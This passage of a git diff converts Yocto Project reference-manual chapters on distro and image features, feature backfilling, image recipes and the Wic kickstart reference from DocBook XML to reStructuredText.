- <listitem><para><emphasis>nfs:</emphasis> Include NFS client
- support (for mounting NFS exports on device).
- </para></listitem>
- <listitem><para><emphasis>opengl:</emphasis>
- Include the Open Graphics Library, which is a
- cross-language, multi-platform application programming
- interface used for rendering two and three-dimensional
- graphics.</para></listitem>
- <listitem><para><emphasis>pci:</emphasis> Include PCI bus
- support.</para></listitem>
- <listitem><para><emphasis>pcmcia:</emphasis> Include
- PCMCIA/CompactFlash support.</para></listitem>
- <listitem><para><emphasis>ppp:</emphasis> Include PPP dialup
- support.</para></listitem>
- <listitem><para><emphasis>ptest:</emphasis> Enables building
- the package tests where supported by individual recipes.
- For more information on package tests, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#testing-packages-with-ptest'>Testing Packages With ptest</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- <listitem><para><emphasis>smbfs:</emphasis> Include SMB networks
- client support (for mounting Samba/Microsoft Windows shares
- on device).</para></listitem>
- <listitem><para><emphasis>systemd:</emphasis> Include support
- for this <filename>init</filename> manager, which is a full
- replacement of for <filename>init</filename> with parallel
- starting of services, reduced shell overhead, and other
- features.
- This <filename>init</filename> manager is used by many
- distributions.</para></listitem>
- <listitem><para><emphasis>usbgadget:</emphasis> Include USB
- Gadget Device support (for USB networking/serial/storage).
- </para></listitem>
- <listitem><para><emphasis>usbhost:</emphasis> Include USB Host
- support (allows to connect external keyboard, mouse,
- storage, network etc).</para></listitem>
- <listitem><para><emphasis>usrmerge:</emphasis> Merges the
- <filename>/bin</filename>, <filename>/sbin</filename>,
- <filename>/lib</filename>, and <filename>/lib64</filename>
- directories into their respective counterparts in the
- <filename>/usr</filename> directory to provide better package
- and application compatibility.</para></listitem>
- <listitem><para><emphasis>wayland:</emphasis> Include the
- Wayland display server protocol and the library that
- supports it.</para></listitem>
- <listitem><para><emphasis>wifi:</emphasis> Include WiFi support
- (integrated only).</para></listitem>
- <listitem><para><emphasis>x11:</emphasis> Include the X server
- and libraries.</para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='ref-features-image'>
- <title>Image Features</title>
-
- <para>
- The contents of images generated by the OpenEmbedded build system
- can be controlled by the
- <link linkend='var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></link>
- and
- <link linkend='var-EXTRA_IMAGE_FEATURES'><filename>EXTRA_IMAGE_FEATURES</filename></link>
- variables that you typically configure in your image recipes.
- Through these variables, you can add several different
- predefined packages such as development utilities or packages with
- debug information needed to investigate application problems or
- profile applications.
- </para>
-
- <para>
- The following image features are available for all images:
- <itemizedlist>
- <listitem><para><emphasis>allow-empty-password:</emphasis>
- Allows Dropbear and OpenSSH to accept root logins
- and logins from accounts having an empty password string.
- </para></listitem>
- <listitem><para><emphasis>dbg-pkgs:</emphasis>
- Installs debug symbol packages for all packages installed
- in a given image.
- </para></listitem>
- <listitem><para><emphasis>debug-tweaks:</emphasis>
- Makes an image suitable for development (e.g.
- allows root logins without passwords and enables
- post-installation logging).
- See the 'allow-empty-password', 'empty-root-password',
- and 'post-install-logging' features in this list for
- additional information.
- </para></listitem>
- <listitem><para><emphasis>dev-pkgs:</emphasis>
- Installs development packages (headers and extra library
- links) for all packages installed in a given image.
- </para></listitem>
- <listitem><para><emphasis>doc-pkgs:</emphasis> Installs
- documentation packages for all packages installed in a
- given image.
- </para></listitem>
- <listitem><para><emphasis>empty-root-password:</emphasis>
- Sets the root password to an empty string, which allows
- logins with a blank password.
- </para></listitem>
- <listitem><para><emphasis>package-management:</emphasis>
- Installs package management tools and preserves the package
- manager database.
- </para></listitem>
- <listitem><para><emphasis>post-install-logging:</emphasis>
- Enables logging postinstall script runs to
- the <filename>/var/log/postinstall.log</filename> file
- on first boot of the image on the target system.
- <note>
- To make the <filename>/var/log</filename> directory
- on the target persistent, use the
- <link linkend='var-VOLATILE_LOG_DIR'><filename>VOLATILE_LOG_DIR</filename></link>
- variable by setting it to "no".
- </note>
- </para></listitem>
- <listitem><para><emphasis>ptest-pkgs:</emphasis>
- Installs ptest packages for all ptest-enabled recipes.
- </para></listitem>
- <listitem><para><emphasis>read-only-rootfs:</emphasis>
- Creates an image whose root filesystem is read-only.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-a-read-only-root-filesystem'>Creating a Read-Only Root Filesystem</ulink>"
- section in the Yocto Project Development Tasks Manual for
- more information.
- </para></listitem>
- <listitem><para><emphasis>splash:</emphasis>
- Enables showing a splash screen during boot.
- By default, this screen is provided by
- <filename>psplash</filename>, which does allow
- customization.
- If you prefer to use an alternative splash screen package,
- you can do so by setting the <filename>SPLASH</filename>
- variable to a different package name (or names) within the
- image recipe or at the distro configuration level.
- </para></listitem>
- <listitem><para><emphasis>staticdev-pkgs:</emphasis>
- Installs static development packages, which are
- static libraries (i.e. <filename>*.a</filename> files), for
- all packages installed in a given image.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Some image features are available only when you inherit the
- <link linkend='ref-classes-core-image'><filename>core-image</filename></link>
- class.
- The current list of these valid features is as follows:
- <itemizedlist>
- <listitem><para><emphasis>hwcodecs:</emphasis> Installs
- hardware acceleration codecs.
- </para></listitem>
- <listitem><para><emphasis>nfs-server:</emphasis>
- Installs an NFS server.
- </para></listitem>
- <listitem><para><emphasis>perf:</emphasis>
- Installs profiling tools such as
- <filename>perf</filename>, <filename>systemtap</filename>,
- and <filename>LTTng</filename>.
- For general information on user-space tools, see the
- <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
- manual.
- </para></listitem>
- <listitem><para><emphasis>ssh-server-dropbear:</emphasis>
- Installs the Dropbear minimal SSH server.
- </para></listitem>
- <listitem><para><emphasis>ssh-server-openssh:</emphasis>
- Installs the OpenSSH SSH server, which is more
- full-featured than Dropbear.
- Note that if both the OpenSSH SSH server and the Dropbear
- minimal SSH server are present in
- <filename>IMAGE_FEATURES</filename>, then OpenSSH will take
- precedence and Dropbear will not be installed.
- </para></listitem>
- <listitem><para><emphasis>tools-debug:</emphasis>
- Installs debugging tools such as
- <filename>strace</filename> and <filename>gdb</filename>.
- For information on GDB, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#platdev-gdb-remotedebug'>Debugging With the GNU Project Debugger (GDB) Remotely</ulink>"
- section in the Yocto Project Development Tasks Manual.
- For information on tracing and profiling, see the
- <ulink url='&YOCTO_DOCS_PROF_URL;'>Yocto Project Profiling and Tracing Manual</ulink>.
- </para></listitem>
- <listitem><para><emphasis>tools-sdk:</emphasis>
- Installs a full SDK that runs on the device.
- </para></listitem>
- <listitem><para><emphasis>tools-testapps:</emphasis>
- Installs device testing tools (e.g. touchscreen debugging).
- </para></listitem>
- <listitem><para><emphasis>x11:</emphasis>
- Installs the X server.
- </para></listitem>
- <listitem><para><emphasis>x11-base:</emphasis>
- Installs the X server with a minimal environment.
- </para></listitem>
- <listitem><para><emphasis>x11-sato:</emphasis>
- Installs the OpenedHand Sato environment.
- </para></listitem>
- </itemizedlist>
- </para>
-
- </section>
-
- <section id='ref-features-backfill'>
- <title>Feature Backfilling</title>
-
- <para>
- Sometimes it is necessary in the OpenEmbedded build system to extend
- <link linkend='var-MACHINE_FEATURES'><filename>MACHINE_FEATURES</filename></link>
- or <link linkend='var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></link>
- to control functionality that was previously enabled and not able
- to be disabled.
- For these cases, we need to add an
- additional feature item to appear in one of these variables,
- but we do not want to force developers who have existing values
- of the variables in their configuration to add the new feature
- in order to retain the same overall level of functionality.
- Thus, the OpenEmbedded build system has a mechanism to
- automatically "backfill" these added features into existing
- distro or machine configurations.
- You can see the list of features for which this is done by
- finding the
- <link linkend='var-DISTRO_FEATURES_BACKFILL'><filename>DISTRO_FEATURES_BACKFILL</filename></link>
- and <link linkend='var-MACHINE_FEATURES_BACKFILL'><filename>MACHINE_FEATURES_BACKFILL</filename></link>
- variables in the <filename>meta/conf/bitbake.conf</filename> file.
- </para>
-
- <para>
- Because such features are backfilled by default into all
- configurations as described in the previous paragraph, developers
- who wish to disable the new features need to be able to selectively
- prevent the backfilling from occurring.
- They can do this by adding the undesired feature or features to the
- <link linkend='var-DISTRO_FEATURES_BACKFILL_CONSIDERED'><filename>DISTRO_FEATURES_BACKFILL_CONSIDERED</filename></link>
- or <link linkend='var-MACHINE_FEATURES_BACKFILL_CONSIDERED'><filename>MACHINE_FEATURES_BACKFILL_CONSIDERED</filename></link>
- variables for distro features and machine features respectively.
- </para>
-
- <para>
- Here are two examples to help illustrate feature backfilling:
- <itemizedlist>
- <listitem><para><emphasis>The "pulseaudio" distro feature option</emphasis>:
- Previously, PulseAudio support was enabled within the Qt and
- GStreamer frameworks.
- Because of this, the feature is backfilled and thus
- enabled for all distros through the
- <filename>DISTRO_FEATURES_BACKFILL</filename>
- variable in the <filename>meta/conf/bitbake.conf</filename> file.
- However, your distro needs to disable the feature.
- You can disable the feature without affecting
- other existing distro configurations that need PulseAudio support
- by adding "pulseaudio" to
- <filename>DISTRO_FEATURES_BACKFILL_CONSIDERED</filename>
- in your distro's <filename>.conf</filename> file.
- Adding the feature to this variable when it also
- exists in the <filename>DISTRO_FEATURES_BACKFILL</filename>
- variable prevents the build system from adding the feature to
- your configuration's <filename>DISTRO_FEATURES</filename>, effectively disabling
- the feature for that particular distro.</para></listitem>
- <listitem><para><emphasis>The "rtc" machine feature option</emphasis>:
- Previously, real time clock (RTC) support was enabled for all
- target devices.
- Because of this, the feature is backfilled and thus enabled
- for all machines through the <filename>MACHINE_FEATURES_BACKFILL</filename>
- variable in the <filename>meta/conf/bitbake.conf</filename> file.
- However, your target device does not have this capability.
- You can disable RTC support for your device without
- affecting other machines that need RTC support
- by adding the feature to your machine's
- <filename>MACHINE_FEATURES_BACKFILL_CONSIDERED</filename>
- list in the machine's <filename>.conf</filename> file.
- Adding the feature to this variable when it also
- exists in the <filename>MACHINE_FEATURES_BACKFILL</filename>
- variable prevents the build system from adding the feature to
- your configuration's <filename>MACHINE_FEATURES</filename>, effectively
- disabling RTC support for that particular machine.</para></listitem>
- </itemizedlist>
- </para>
- </section>
-</chapter>
-
-<!--
-vim: expandtab tw=80 ts=4 spell spelllang=en_gb
--->
diff --git a/documentation/ref-manual/ref-images.rst b/documentation/ref-manual/ref-images.rst
new file mode 100644
index 0000000000..70feadf1ff
--- /dev/null
+++ b/documentation/ref-manual/ref-images.rst
@@ -0,0 +1,139 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+******
+Images
+******
+
+The OpenEmbedded build system provides several example images to satisfy
+different needs. When you issue the ``bitbake`` command you provide a
+"top-level" recipe that essentially begins the build for the type of
+image you want.
+
+.. note::
+
+ Building an image without GNU General Public License Version 3
+ (GPLv3), GNU Lesser General Public License Version 3 (LGPLv3), and
+ the GNU Affero General Public License Version 3 (AGPL-3.0) components
+ is only tested for core-image-minimal image. Furthermore, if you would like to
+ build an image and verify that it does not include GPLv3 and similarly licensed
+ components, you must make the following changes in the image recipe
+ file before using the BitBake command to build the image:
+
+ INCOMPATIBLE_LICENSE = "GPL-3.0* LGPL-3.0*"
+
+ Alternatively, you can adjust ``local.conf`` file, repeating and adjusting the line
+ for all images where the license restriction must apply:
+
+ INCOMPATIBLE_LICENSE_pn-your-image-name = "GPL-3.0* LGPL-3.0*"
+
+From within the ``poky`` Git repository, you can use the following
+command to display the list of directories within the :term:`Source Directory`
+that contain image recipe files: ::
+
+ $ ls meta*/recipes*/images/*.bb
+
+Following is a list of supported recipes:
+
+- ``build-appliance-image``: An example virtual machine that contains
+ all the pieces required to run builds using the build system as well
+ as the build system itself. You can boot and run the image using
+ either the `VMware
+ Player <http://www.vmware.com/products/player/overview.html>`__ or
+ `VMware
+ Workstation <http://www.vmware.com/products/workstation/overview.html>`__.
+ For more information on this image, see the :yocto_home:`Build
+ Appliance </software-item/build-appliance>` page
+ on the Yocto Project website.
+
+- ``core-image-base``: A console-only image that fully supports the
+ target device hardware.
+
+- ``core-image-clutter``: An image with support for the Open GL-based
+ toolkit Clutter, which enables development of rich and animated
+ graphical user interfaces.
+
+- ``core-image-full-cmdline``: A console-only image with more
+ full-featured Linux system functionality installed.
+
+- ``core-image-lsb``: An image that conforms to the Linux Standard Base
+ (LSB) specification. This image requires a distribution configuration
+ that enables LSB compliance (e.g. ``poky-lsb``). If you build
+ ``core-image-lsb`` without that configuration, the image will not be
+ LSB-compliant.
+
+- ``core-image-lsb-dev``: A ``core-image-lsb`` image that is suitable
+ for development work using the host. The image includes headers and
+ libraries you can use in a host development environment. This image
+ requires a distribution configuration that enables LSB compliance
+ (e.g. ``poky-lsb``). If you build ``core-image-lsb-dev`` without that
+ configuration, the image will not be LSB-compliant.
+
+- ``core-image-lsb-sdk``: A ``core-image-lsb`` that includes everything
+ in the cross-toolchain but also includes development headers and
+ libraries to form a complete standalone SDK. This image requires a
+ distribution configuration that enables LSB compliance (e.g.
+ ``poky-lsb``). If you build ``core-image-lsb-sdk`` without that
+ configuration, the image will not be LSB-compliant. This image is
+ suitable for development using the target.
+
+- ``core-image-minimal``: A small image just capable of allowing a
+ device to boot.
+
+- ``core-image-minimal-dev``: A ``core-image-minimal`` image suitable
+ for development work using the host. The image includes headers and
+ libraries you can use in a host development environment.
+
+- ``core-image-minimal-initramfs``: A ``core-image-minimal`` image that
+ has the Minimal RAM-based Initial Root Filesystem (initramfs) as part
+ of the kernel, which allows the system to find the first "init"
+ program more efficiently. See the
+ :term:`PACKAGE_INSTALL` variable for
+ additional information helpful when working with initramfs images.
+
+- ``core-image-minimal-mtdutils``: A ``core-image-minimal`` image that
+ has support for the Minimal MTD Utilities, which let the user
+ interact with the MTD subsystem in the kernel to perform operations
+ on flash devices.
+
+- ``core-image-rt``: A ``core-image-minimal`` image plus a real-time
+ test suite and tools appropriate for real-time use.
+
+- ``core-image-rt-sdk``: A ``core-image-rt`` image that includes
+ everything in the cross-toolchain. The image also includes
+ development headers and libraries to form a complete stand-alone SDK
+ and is suitable for development using the target.
+
+- ``core-image-sato``: An image with Sato support, a mobile environment
+ and visual style that works well with mobile devices. The image
+ supports X11 with a Sato theme and applications such as a terminal,
+ editor, file manager, media player, and so forth.
+
+- ``core-image-sato-dev``: A ``core-image-sato`` image suitable for
+ development using the host. The image includes libraries needed to
+ build applications on the device itself, testing and profiling tools,
+ and debug symbols. This image was formerly ``core-image-sdk``.
+
+- ``core-image-sato-sdk``: A ``core-image-sato`` image that includes
+ everything in the cross-toolchain. The image also includes
+ development headers and libraries to form a complete standalone SDK
+ and is suitable for development using the target.
+
+- ``core-image-testmaster``: A "master" image designed to be used for
+ automated runtime testing. Provides a "known good" image that is
+ deployed to a separate partition so that you can boot into it and use
+ it to deploy a second image to be tested. You can find more
+ information about runtime testing in the
+ ":ref:`dev-manual/dev-manual-common-tasks:performing automated runtime testing`"
+ section in the Yocto Project Development Tasks Manual.
+
+- ``core-image-testmaster-initramfs``: A RAM-based Initial Root
+ Filesystem (initramfs) image tailored for use with the
+ ``core-image-testmaster`` image.
+
+- ``core-image-weston``: A very basic Wayland image with a terminal.
+ This image provides the Wayland protocol libraries and the reference
+ Weston compositor. For more information, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:using wayland and weston`"
+ section in the Yocto Project Development Tasks Manual.
+
+- ``core-image-x11``: A very basic X11 image with a terminal.
diff --git a/documentation/ref-manual/ref-images.xml b/documentation/ref-manual/ref-images.xml
deleted file mode 100644
index 1f96186c6e..0000000000
--- a/documentation/ref-manual/ref-images.xml
+++ /dev/null
@@ -1,169 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-images'>
- <title>Images</title>
-
- <para>
- The OpenEmbedded build system provides several example
- images to satisfy different needs.
- When you issue the <filename>bitbake</filename> command you provide a “top-level†recipe
- that essentially begins the build for the type of image you want.
- </para>
-
- <note>
- Building an image without GNU General Public License Version 3 (GPLv3),
- GNU Lesser General Public License Version 3 (LGPLv3), and the
- GNU Affero General Public License Version 3 (AGPL-3.0) components
- is only supported for minimal and base images.
- Furthermore, if you are going to build an image using non-GPLv3 and
- similarly licensed components, you must make the following changes in
- the <filename>local.conf</filename> file before using the BitBake
- command to build the minimal or base image:
- <literallayout class='monospaced'>
- 1. Comment out the EXTRA_IMAGE_FEATURES line
- 2. Set INCOMPATIBLE_LICENSE = "GPL-3.0 LGPL-3.0 AGPL-3.0"
- </literallayout>
- </note>
-
- <para>
- From within the <filename>poky</filename> Git repository, you can use
- the following command to display the list of directories within the
- <link linkend='source-directory'>Source Directory</link>
- that contain image recipe files:
- <literallayout class='monospaced'>
- $ ls meta*/recipes*/images/*.bb
- </literallayout>
- </para>
-
- <para>
- Following is a list of supported recipes:
- <itemizedlist>
- <listitem><para>
- <filename>build-appliance-image</filename>:
- An example virtual machine that contains all the pieces
- required to run builds using the build system as well as the
- build system itself.
- You can boot and run the image using either the
- <ulink url='http://www.vmware.com/products/player/overview.html'>VMware Player</ulink>
- or
- <ulink url='http://www.vmware.com/products/workstation/overview.html'>VMware Workstation</ulink>.
- For more information on this image, see the
- <ulink url='&YOCTO_HOME_URL;/software-item/build-appliance/'>Build Appliance</ulink>
- page on the Yocto Project website.
- </para></listitem>
- <listitem><para><filename>core-image-base</filename>:
- A console-only image that fully supports the target device hardware.</para></listitem>
- <listitem><para><filename>core-image-clutter</filename>:
- An image with support for the Open GL-based toolkit Clutter, which enables development of
- rich and animated graphical user interfaces.</para></listitem>
- <listitem><para><filename>core-image-full-cmdline</filename>:
- A console-only image with more full-featured Linux system
- functionality installed.</para></listitem>
- <listitem><para><filename>core-image-lsb</filename>:
- An image that conforms to the Linux Standard Base (LSB)
- specification.
- This image requires a distribution configuration that
- enables LSB compliance (e.g. <filename>poky-lsb</filename>).
- If you build <filename>core-image-lsb</filename> without that
- configuration, the image will not be LSB-compliant.
- </para></listitem>
- <listitem><para><filename>core-image-lsb-dev</filename>:
- A <filename>core-image-lsb</filename> image that is suitable for development work
- using the host.
- The image includes headers and libraries you can use in a host development
- environment.
- This image requires a distribution configuration that
- enables LSB compliance (e.g. <filename>poky-lsb</filename>).
- If you build <filename>core-image-lsb-dev</filename> without that
- configuration, the image will not be LSB-compliant.
- </para></listitem>
- <listitem><para><filename>core-image-lsb-sdk</filename>:
- A <filename>core-image-lsb</filename> that includes everything in
- the cross-toolchain but also includes development headers and libraries
- to form a complete standalone SDK.
- This image requires a distribution configuration that
- enables LSB compliance (e.g. <filename>poky-lsb</filename>).
- If you build <filename>core-image-lsb-sdk</filename> without that
- configuration, the image will not be LSB-compliant.
- This image is suitable for development using the target.</para></listitem>
- <listitem><para><filename>core-image-minimal</filename>:
- A small image just capable of allowing a device to boot.</para></listitem>
- <listitem><para><filename>core-image-minimal-dev</filename>:
- A <filename>core-image-minimal</filename> image suitable for development work
- using the host.
- The image includes headers and libraries you can use in a host development
- environment.
- </para></listitem>
- <listitem><para id='images-core-image-minimal-initramfs'><filename>core-image-minimal-initramfs</filename>:
- A <filename>core-image-minimal</filename> image that has the Minimal RAM-based
- Initial Root Filesystem (initramfs) as part of the kernel,
- which allows the system to find the first “init†program more efficiently.
- See the
- <link linkend='var-PACKAGE_INSTALL'><filename>PACKAGE_INSTALL</filename></link>
- variable for additional information helpful when working with
- initramfs images.
- </para></listitem>
- <listitem><para><filename>core-image-minimal-mtdutils</filename>:
- A <filename>core-image-minimal</filename> image that has support
- for the Minimal MTD Utilities, which let the user interact with the
- MTD subsystem in the kernel to perform operations on flash devices.
- </para></listitem>
- <listitem><para><filename>core-image-rt</filename>:
- A <filename>core-image-minimal</filename> image plus a real-time test suite and
- tools appropriate for real-time use.</para></listitem>
- <listitem><para><filename>core-image-rt-sdk</filename>:
- A <filename>core-image-rt</filename> image that includes everything in
- the cross-toolchain.
- The image also includes development headers and libraries to form a complete
- stand-alone SDK and is suitable for development using the target.
- </para></listitem>
- <listitem><para><filename>core-image-sato</filename>:
- An image with Sato support, a mobile environment and visual style that works well
- with mobile devices.
- The image supports X11 with a Sato theme and applications such as
- a terminal, editor, file manager, media player, and so forth.
- </para></listitem>
- <listitem><para><filename>core-image-sato-dev</filename>:
- A <filename>core-image-sato</filename> image suitable for development
- using the host.
- The image includes libraries needed to build applications on the device itself,
- testing and profiling tools, and debug symbols.
- This image was formerly <filename>core-image-sdk</filename>.
- </para></listitem>
- <listitem><para><filename>core-image-sato-sdk</filename>:
- A <filename>core-image-sato</filename> image that includes everything in
- the cross-toolchain.
- The image also includes development headers and libraries to form a complete standalone SDK
- and is suitable for development using the target.</para></listitem>
- <listitem><para><filename>core-image-testmaster</filename>:
- A "master" image designed to be used for automated runtime testing.
- Provides a "known good" image that is deployed to a separate
- partition so that you can boot into it and use it to deploy a
- second image to be tested.
- You can find more information about runtime testing in the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#performing-automated-runtime-testing'>Performing Automated Runtime Testing</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- <listitem><para><filename>core-image-testmaster-initramfs</filename>:
- A RAM-based Initial Root Filesystem (initramfs) image tailored for
- use with the <filename>core-image-testmaster</filename> image.
- </para></listitem>
- <listitem><para><filename>core-image-weston</filename>:
- A very basic Wayland image with a terminal.
- This image provides the Wayland protocol libraries and the
- reference Weston compositor.
- For more information, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-using-wayland-and-weston'>Using Wayland and Weston</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para></listitem>
- <listitem><para><filename>core-image-x11</filename>:
- A very basic X11 image with a terminal.
- </para></listitem>
- </itemizedlist>
- </para>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/ref-kickstart.rst b/documentation/ref-manual/ref-kickstart.rst
new file mode 100644
index 0000000000..7f6d4ebe1c
--- /dev/null
+++ b/documentation/ref-manual/ref-kickstart.rst
@@ -0,0 +1,216 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+*******************************************
+OpenEmbedded Kickstart (``.wks``) Reference
+*******************************************
+
+.. _openembedded-kickstart-wks-reference:
+
+Introduction
+============
+
+The current Wic implementation supports only the basic kickstart
+partitioning commands: ``partition`` (or ``part`` for short) and
+``bootloader``.
+
+.. note::
+
+ Future updates will implement more commands and options. If you use
+ anything that is not specifically supported, results can be
+ unpredictable.
+
+This chapter provides a reference on the available kickstart commands.
+The information lists the commands, their syntax, and meanings.
+Kickstart commands are based on the Fedora kickstart versions but with
+modifications to reflect Wic capabilities. You can see the original
+documentation for those commands at the following link:
+http://pykickstart.readthedocs.io/en/latest/kickstart-docs.html
+
+Command: part or partition
+==========================
+
+Either of these commands creates a partition on the system and uses the
+following syntax:
+::
+
+ part [mntpoint]
+ partition [mntpoint]
+
+If you do not
+provide mntpoint, Wic creates a partition but does not mount it.
+
+The ``mntpoint`` is where the partition is mounted and must be in one of
+the following forms:
+
+- ``/path``: For example, "/", "/usr", or "/home"
+
+- ``swap``: The created partition is used as swap space
+
+Specifying a mntpoint causes the partition to automatically be mounted.
+Wic achieves this by adding entries to the filesystem table (fstab)
+during image generation. In order for Wic to generate a valid fstab, you
+must also provide one of the ``--ondrive``, ``--ondisk``, or
+``--use-uuid`` partition options as part of the command.
+
+.. note::
+
+ The mount program must understand the PARTUUID syntax you use with
+ ``--use-uuid`` and non-root *mountpoint*, including swap. The busybox
+ versions of these application are currently excluded.
+
+Here is an example that uses "/" as the mountpoint. The command uses
+``--ondisk`` to force the partition onto the ``sdb`` disk:
+::
+
+ part / --source rootfs --ondisk sdb --fstype=ext3 --label platform --align 1024
+
+Here is a list that describes other supported options you can use with
+the ``part`` and ``partition`` commands:
+
+- ``--size``: The minimum partition size in MBytes. Specify an
+ integer value such as 500. Do not append the number with "MB". You do
+ not need this option if you use ``--source``.
+
+- ``--fixed-size``: The exact partition size in MBytes. You cannot
+ specify with ``--size``. An error occurs when assembling the disk
+ image if the partition data is larger than ``--fixed-size``.
+
+- ``--source``: This option is a Wic-specific option that names the
+ source of the data that populates the partition. The most common
+ value for this option is "rootfs", but you can use any value that
+ maps to a valid source plugin. For information on the source plugins,
+ see the ":ref:`dev-manual/dev-manual-common-tasks:using the wic plugin interface`"
+ section in the Yocto Project Development Tasks Manual.
+
+ If you use ``--source rootfs``, Wic creates a partition as large as
+ needed and fills it with the contents of the root filesystem pointed
+ to by the ``-r`` command-line option or the equivalent rootfs derived
+ from the ``-e`` command-line option. The filesystem type used to
+ create the partition is driven by the value of the ``--fstype``
+ option specified for the partition. See the entry on ``--fstype``
+ that follows for more information.
+
+ If you use ``--source plugin-name``, Wic creates a partition as large
+ as needed and fills it with the contents of the partition that is
+ generated by the specified plugin name using the data pointed to by
+ the ``-r`` command-line option or the equivalent rootfs derived from
+ the ``-e`` command-line option. Exactly what those contents are and
+ filesystem type used are dependent on the given plugin
+ implementation.
+
+ If you do not use the ``--source`` option, the ``wic`` command
+ creates an empty partition. Consequently, you must use the ``--size``
+ option to specify the size of the empty partition.
+
+- ``--ondisk`` or ``--ondrive``: Forces the partition to be created
+ on a particular disk.
+
+- ``--fstype``: Sets the file system type for the partition. Valid
+ values are:
+
+ - ``ext4``
+
+ - ``ext3``
+
+ - ``ext2``
+
+ - ``btrfs``
+
+ - ``squashfs``
+
+ - ``swap``
+
+- ``--fsoptions``: Specifies a free-form string of options to be used
+ when mounting the filesystem. This string is copied into the
+ ``/etc/fstab`` file of the installed system and should be enclosed in
+ quotes. If not specified, the default string is "defaults".
+
+- ``--label label``: Specifies the label to give to the filesystem to
+ be made on the partition. If the given label is already in use by
+ another filesystem, a new label is created for the partition.
+
+- ``--active``: Marks the partition as active.
+
+- ``--align (in KBytes)``: This option is a Wic-specific option that
+ says to start partitions on boundaries given x KBytes.
+
+- ``--offset (in KBytes)``: This option is a Wic-specific option that
+ says to place a partition at exactly the specified offset. If the
+ partition cannot be placed at the specified offset, the image build
+ will fail.
+
+- ``--no-table``: This option is a Wic-specific option. Using the
+ option reserves space for the partition and causes it to become
+ populated. However, the partition is not added to the partition
+ table.
+
+- ``--exclude-path``: This option is a Wic-specific option that
+ excludes the given relative path from the resulting image. This
+ option is only effective with the rootfs source plugin.
+
+- ``--extra-space``: This option is a Wic-specific option that adds
+ extra space after the space filled by the content of the partition.
+ The final size can exceed the size specified by the ``--size``
+ option. The default value is 10 Mbytes.
+
+- ``--overhead-factor``: This option is a Wic-specific option that
+ multiplies the size of the partition by the option's value. You must
+ supply a value greater than or equal to "1". The default value is
+ "1.3".
+
+- ``--part-name``: This option is a Wic-specific option that
+ specifies a name for GPT partitions.
+
+- ``--part-type``: This option is a Wic-specific option that
+ specifies the partition type globally unique identifier (GUID) for
+ GPT partitions. You can find the list of partition type GUIDs at
+ http://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs.
+
+- ``--use-uuid``: This option is a Wic-specific option that causes
+ Wic to generate a random GUID for the partition. The generated
+ identifier is used in the bootloader configuration to specify the
+ root partition.
+
+- ``--uuid``: This option is a Wic-specific option that specifies the
+ partition UUID.
+
+- ``--fsuuid``: This option is a Wic-specific option that specifies
+ the filesystem UUID. You can generate or modify
+ :term:`WKS_FILE` with this option if a preconfigured
+ filesystem UUID is added to the kernel command line in the bootloader
+ configuration before you run Wic.
+
+- ``--system-id``: This option is a Wic-specific option that
+ specifies the partition system ID, which is a one byte long,
+ hexadecimal parameter with or without the 0x prefix.
+
+- ``--mkfs-extraopts``: This option specifies additional options to
+ pass to the ``mkfs`` utility. Some default options for certain
+ filesystems do not take effect. See Wic's help on kickstart (i.e.
+ ``wic help kickstart``).
+
+Command: bootloader
+===================
+
+This command specifies how the bootloader should be configured and
+supports the following options:
+
+.. note::
+
+ Bootloader functionality and boot partitions are implemented by the
+ various
+ --source
+ plugins that implement bootloader functionality. The bootloader
+ command essentially provides a means of modifying bootloader
+ configuration.
+
+- ``--timeout``: Specifies the number of seconds before the
+ bootloader times out and boots the default option.
+
+- ``--append``: Specifies kernel parameters. These parameters will be
+ added to the syslinux ``APPEND`` or ``grub`` kernel command line.
+
+- ``--configfile``: Specifies a user-defined configuration file for
+ the bootloader. You can provide a full pathname for the file or a
+ file that exists in the ``canned-wks`` folder. This option overrides
+ all other bootloader options.
diff --git a/documentation/ref-manual/ref-kickstart.xml b/documentation/ref-manual/ref-kickstart.xml
deleted file mode 100644
index 1128bd50d0..0000000000
--- a/documentation/ref-manual/ref-kickstart.xml
+++ /dev/null
@@ -1,334 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-kickstart'>
-<title>OpenEmbedded Kickstart (<filename>.wks</filename>) Reference</title>
-
- <section id='openembedded-kickstart-wks-reference'>
- <title>Introduction</title>
-
- <para>
- The current Wic implementation supports only the basic kickstart
- partitioning commands:
- <filename>partition</filename> (or <filename>part</filename>
- for short) and <filename>bootloader</filename>.
- <note>
- Future updates will implement more commands and options.
- If you use anything that is not specifically supported, results
- can be unpredictable.
- </note>
- </para>
-
- <para>
- This chapter provides a reference on the available kickstart
- commands.
- The information lists the commands, their syntax, and meanings.
- Kickstart commands are based on the Fedora kickstart versions but
- with modifications to reflect Wic capabilities.
- You can see the original documentation for those commands at the
- following link:
- <literallayout class='monospaced'>
